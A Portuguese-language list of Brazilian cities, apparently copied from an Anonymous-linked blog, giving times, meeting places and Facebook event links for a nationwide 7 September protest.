MG - Belo Horizonte - 16h na Praça da Liberdadehttps://facebook.com/events/218026361640943/ 

MG - Governador Valadares - https://facebook.com/events/279208892175296/ 

MG- Juiz de Fora - 16h no Parque Halfeld https://facebook.com/events/243649625741816/ 

MS - Campo Grande - ? na Praça da República / Rádio Clubehttps://facebook.com/events/220214931430332/ 

MS - Dourados Parque dos Ipês às 15:30 https://www.facebook.com/events/311050235656081/ 

MT - Rondonópolis Praça da Lions (em frente a lions gelo) 16hhttps://www.facebook.com/events/309269022497043/ 

PA - Belém - 16h na Praça da República https://www.facebook.com/events/458334287514663/ 

PB- João Pessoa https://www.facebook.com/events/272094802887850/ 

PE - Garanhuns - "Definindo" 

PI - Teresina - 16h na Av. Frei Serafim https://facebook.com/events/391185200925097/ 

PR - Curitiba - 15h na Praça Santos Andrade https://facebook.com/events/303775193041104 

PR - Foz do Iguaçu - https://facebook.com/events/463061350377025/ 

PR- Francisco Beltrão - ? na Rua União da Vitóriahttps://facebook.com/events/377772902259694/ 

PR- Londrina - 16h na Concha Acústica de Londrina. Av. Paraná, Confluência das ruas Piauí e Senador Souza Naves, Centro https://facebook.com/events/316559168418147/ 

PR - Maringá - 16h na Catredal https://facebook.com/events/291556757598543/ 

PR - Pato Branco http://facebook.com/events/374891019229378 

PR- Paranaguá - https://facebook.com/events/393490544034375/ 

RJ- Angra dos Reis 16h Praça da Igreja do Carmohttps://www.facebook.com/events/157992204333022/ 

RJ - Cabo Frio - 16H na praça porto rocha praia do fortehttps://facebook.com/events/403701969674019/ 

RJ - Rio de Janeiro - 16h no Posto 4 de copacabanahttps://facebook.com/events/407779492577481 

RJ - Marica - ? na Rodoviaria de Marica https://facebook.com/events/446354638725417/ 

RJ - Nova Friburgo 16h em frente a Camara Municipalhttps://facebook.com/events/211032585684469/ 

RN - Mossoró - https://facebook.com/events/444927152185479/ 

RN - Natal - 16h na Av. Roberto Freire https://facebook.com/events/366835696704000/ 

RR - Boa Vista - 15h na Praça do Centro Cívico https://facebook.com/events/408707219160571/

RS - Passo fundo - https://facebook.com/events/399714026734086/ 

RS - Porto Alegre - 9h na Ponte de pedra, Rua Washington Luis, perto do Monumento aos Açorianos https://facebook.com/events/409776255712218/ 

SC - Araranguá https://facebook.com/events/407749679257424/ 

SC - Balneário Camboriú - 16h na Praca Almirante Tamandare - Balneario Camboriuhttps://facebook.com/events/436631873033113/ 

SC - Florianópolis - 16h no Trapiche Beira-Marhttps://www.facebook.com/events/350919781630124/ 

SC - Joinville - https://facebook.com/events/312875818791706/ 

SE - Aracaju - 16h no Arcos da Orla de Atalaia https://facebook.com/events/315706631839334/ 

SP - Baurueri - https://facebook.com/events/266372373461906/ 

SP - Bebedouro - https://facebook.com/events/363218890402459/ 

SP - São Bernardo do Campo - Prefeitura Municipal São Bernardo Campo Paco Municipalhttps://facebook.com/events/315007061907346/ 

SP - Campinas https://facebook.com/events/377782195596642/ 

SP - Marília - 16h na Av. Sampaio Vidal, frente espaço culturalhttps://facebook.com/events/412844872088564/ 

SP - Osasco https://facebook.com/events/372621156117839/ 

SP - Ribeirão Preto - 16h no Teatro Dom Pedro IIhttps://facebook.com/events/303974796344100/ 

SP- Santos https://facebook.com/events/410761888944739/ 

SP - São Paulo - http://facebook.com/events/238665489567654/ 

SP - Sorocaba 16h na Praça da Bandeira, ao lado do terminal Stº. Antôniohttps://facebook.com/events/372872129416958/ 

SP - Taubaté - https://www.facebook.com/events/219852898131351/ 

TO - Palmas - 16h na Praça dos Girassóishttps://www.facebook.com/events/142041949254082/



Fonte :  http://anonopsbrazil.blogspot.com.br/p/7-de-setembro-protesto-nivel-nacional.html